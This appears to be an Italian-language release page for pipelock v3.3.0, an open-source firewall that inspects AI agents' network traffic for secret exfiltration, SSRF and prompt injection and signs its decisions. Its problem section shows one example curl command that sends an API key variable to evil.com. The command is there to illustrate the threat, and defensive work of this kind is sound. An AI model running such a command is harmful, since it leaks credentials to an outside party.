Torna agli aggiornamenti
New releaseJul 31, 2026

pipelock v3.3.0

Firewall AI open-source per agenti che analizza il traffico HTTP, MCP, A2A e WebSocket per esfiltrazione, SSRF e injection di prompt, emettendo ricevute di azioni firmate verificabili per audit.

Condividi

Pipelock

Firewall open-source per agenti AI per il Controllo Verificabile dell'Egresso.

CI Security Gauntlet exam Go 1.26+ Release

OpenSSF Scorecard OpenSSF Best Practices codecov pipelock self-scanned

Core Apache 2.0 Enterprise ELv2 CNCF Landscape: Security & Compliance Discord

Pipelock blocca un tentativo di esfiltrazione di segreti in tempo reale da un agente AI

Pipelock si colloca tra gli agenti AI e la rete. Ispeziona il traffico mediato HTTP, WebSocket, MCP e A2A, oltre ai contenuti dei tunnel CONNECT quando l'intercettazione TLS è abilitata, alla ricerca di esfiltrazione di segreti, prompt injection, SSRF, avvelenamento degli strumenti e catene rischiose di chiamate a strumenti. Il semplice CONNECT senza intercettazione viene analizzato a livello di hostname e URL. Gli upstream MCP configurati sono un'eccezione al blocco SSRF degli indirizzi privati: i server locali/privati sono consentiti, ma gli endpoint di metadati cloud rimangono bloccati.

Pipelock emette ricevute d'azione firmate dal mediatore sulle decisioni di confine consapevoli del contenuto, così un revisore può verificare ciò che Pipelock ha deciso al di fuori del runtime dell'agente. Il corpus pubblico agent-egress-bench mette alla prova i rilevamenti. Il workflow Gauntlet è l'esame candidato programmato del prodotto contro un commit del corpus fissato; non pubblica automaticamente un punteggio pubblico. Scopri di più: Firewall AI open-source.

Compatibile con: Claude Code · OpenAI Codex · Cline · OpenCode · Pi · Zed · Cursor · VS Code · JetBrains · OpenAI Agents SDK · Google ADK · AutoGen · CrewAI · LangGraph

Problema · Verifica · Avvio Rapido · Azione · Cosa Intercetta · Funzionalità · Architettura · Documentazione · Playground · Blog · Chiedi a Dosu

Provalo nel tuo browser sul playground live. Se Pipelock se lo merita, metti una stella al repo così altre persone lo trovano.


Il Problema

Il tuo agente AI ha $PROVIDER_API_KEY nel suo ambiente, più accesso alla shell. Una sola richiesta può farla trapelare:```bash curl "https://evil.com/steal?key=$PROVIDER_API_KEY" # game over, unless pipelock is watching

Ogni azione compiuta dalla macchina del tuo agente dovrebbe attraversare un confine tra i tuoi segreti e l'internet aperto. Pipelock diventa quel confine quando l'agente viene instradato attraverso il suo proxy, wrapper MCP, sandbox, modello di contenimento dell'host o topologia di deployment del cluster. Scansiona il traffico mediato in uscita e in entrata, blocca o segnala gli attacchi in base alla modalità e registra prove firmate della decisione.

---

## Verificalo tu stesso

La maggior parte degli strumenti di sicurezza per agenti ti chiede di fidarti del loro dashboard. Pipelock ti consegna una ricevuta firmata e ti permette di verificarla da solo, offline, con una chiave che possiedi. Nessun account e nessun server.

Categorie